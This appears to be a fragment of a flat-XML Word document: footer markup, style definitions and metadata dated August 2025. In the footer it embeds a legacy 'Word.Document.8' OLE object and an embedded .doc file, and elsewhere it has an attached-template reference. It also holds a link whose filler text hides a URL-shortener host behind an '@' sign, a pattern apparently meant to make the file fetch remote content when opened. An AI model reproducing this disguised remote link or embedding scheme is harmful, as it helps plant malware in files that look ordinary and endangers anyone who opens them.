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Default Extension="doc" ContentType="application/msword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5AA" w:rsidRDefault="005625AA"/>
    <w:sectPr w:rsidR="005625AA" w:rsidSect="005625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518" w:rsidRDefault="00733518" w:rsidP="00E417A7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00733518" w:rsidRDefault="00733518" w:rsidP="00E41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7A7" w:rsidRDefault="00E417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816683752"/>
  <w:bookmarkEnd w:id="0"/>
  <w:p w:rsidR="00E417A7" w:rsidRDefault="00E417A7">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:object w:dxaOrig="9026" w:dyaOrig="4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1.2pt;height:22.8pt" o:ole="">
          <v:imagedata r:id="rId1" o:title=""/>
        </v:shape>
        <o:OLEObject Type="Embed" ProgID="Word.Document.8" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1816683844" r:id="rId2">
          <o:FieldCodes>\s</o:FieldCodes>
        </o:OLEObject>
      </w:object>
    </w:r>
  </w:p>
  <w:p w:rsidR="00E417A7" w:rsidRDefault="00E417A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7A7" w:rsidRDefault="00E417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518" w:rsidRDefault="00733518" w:rsidP="00E417A7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00733518" w:rsidRDefault="00733518" w:rsidP="00E41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7A7" w:rsidRDefault="00E417A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7A7" w:rsidRDefault="00E417A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7A7" w:rsidRDefault="00E417A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17A7"/>
    <w:rsid w:val="00123A54"/>
    <w:rsid w:val="00251F51"/>
    <w:rsid w:val="0025729F"/>
    <w:rsid w:val="00277F68"/>
    <w:rsid w:val="00283794"/>
    <w:rsid w:val="00447E9C"/>
    <w:rsid w:val="0054107E"/>
    <w:rsid w:val="005625AA"/>
    <w:rsid w:val="005672C9"/>
    <w:rsid w:val="00717B0B"/>
    <w:rsid w:val="00733518"/>
    <w:rsid w:val="00863B09"/>
    <w:rsid w:val="009F11E1"/>
    <w:rsid w:val="00B52CCD"/>
    <w:rsid w:val="00C210AB"/>
    <w:rsid w:val="00D25E29"/>
    <w:rsid w:val="00E417A7"/>
    <w:rsid w:val="00FD5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attachedTemplate r:id="rId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41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17A7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E41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7A7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E41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7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Office_Word_97_-_2003_Document1.doc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nicefeaturesbetterservicewithgreat_______wefeelbestandgoodserv.giFFnF=@shorten.website/toY5DQ?&amp;forear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91974</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>91974</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-14T08:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-14T08:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>